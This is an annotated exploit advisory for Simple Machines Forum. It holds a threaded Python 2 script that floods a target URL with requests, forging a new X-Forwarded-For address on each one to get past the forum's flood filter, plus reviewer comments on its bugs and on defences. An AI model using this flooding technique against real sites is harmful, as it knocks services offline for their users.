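Simple Machines Forum (SMF) allows a denial of service condition because of a faulty flood filter. The proof of concept below sends a different X-Forwarded-For value with every request, which suggests the filter identifies clients by that client-supplied header.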
a17c1fc2d75d13b9b2542fff763dfc53947c4fb73ba1599019190380ddc685ab
# Exploit Title: SMF Incorrect Flood Filter Headers
# Date: 21/08/2014
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Simple Machines Forum
# http://www.simplemachines.org
# Tested on: Linux
# DORK: Try yourself ;)
* #!/usr/bin/python
* # RemoteExecution
# NOTE(review): despite the label above, nothing in this listing executes code
# on the server; it only issues HTTP requests in a loop.
* #Author: Daniel Godoy A.K.A hielasangre
*
# Proof of concept for the flood-filter weakness described in the advisory.
# The listing is Python 2 (print statement, raw_input, urllib2). The mail
# formatting prefixed most lines with "* " and dropped all indentation, so the
# text is not runnable as shown and the nesting of the three `while 1:` loops
# cannot be recovered from this page.
#
# What a defender should take from it: every request carries a different
# X-Forwarded-For value while the TCP peer address stays the same. A rate
# limiter should therefore key on the peer address and honour
# X-Forwarded-For only when the peer is a known reverse proxy. In access logs
# the pattern is one peer sending a stream of requests to one URL with the
# forwarded address changing on each of them.
#
# sys, time and re are imported but not used anywhere in the listing.
* import sys, threading, time, urllib2,re
# The target URL is read from standard input.
* print "Ingrese URL: "
* url = raw_input()
# Four module-level counters shared by every thread; they become the four
# dotted fields of the forged address. count tallies the requests sent.
* a = b = c = d = 1
* count = 0
# Worker thread. num is stored but never read in this listing.
* class SMFPwner(threading.Thread):
* def __init__(self, num):
* threading.Thread.__init__(self)
* self.num = num
* def run(self):
* while 1:
# All workers read and write the same globals with no lock.
* global a,b,c,d,count, url
# urllib2 issues a POST whenever data is not None, so this empty string makes
# each request a POST with an empty body.
* data = ""
* while 1:
* while 1:
# Odometer-style advance: d steps by 1 up to 250, then c steps by 2, then b
# by 1, then a by 1, with the lower counters reset to 0 on each carry.
# As written, c starts at 1 and moves in steps of 2, so it never equals 250
# and is never reset; the third field eventually exceeds 255, meaning some of
# the header values are not well-formed IPv4 addresses.
* if d!=250:
* d+=1
* else:
* if c!= 250:
* c+=2
* d=0
* else:
* if b!=250:
* c=0
* d=0
* b+=1
* else:
* a+=1
* b=0
* c=0
* d=0
*
# The counters are joined into a dotted string and sent as the
# X-Forwarded-For header, so each request claims a different client address.
head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
* headers = { 'X-Forwarded-For' : head }
*
# The response object f is never read or closed.
req = urllib2.Request(url, data, headers)
* f = urllib2.urlopen(req)
* count += 1
# The string literal below is split across two lines by mail line-wrapping.
* print "[ Visitando => " + url + " Por
" + str(count) +" vez ]"
# Three workers are started; they are never joined.
* for i in range(3):
* ta = SMFPwner(i)
* ta.start()
http://pastebin.com/TiZc0T05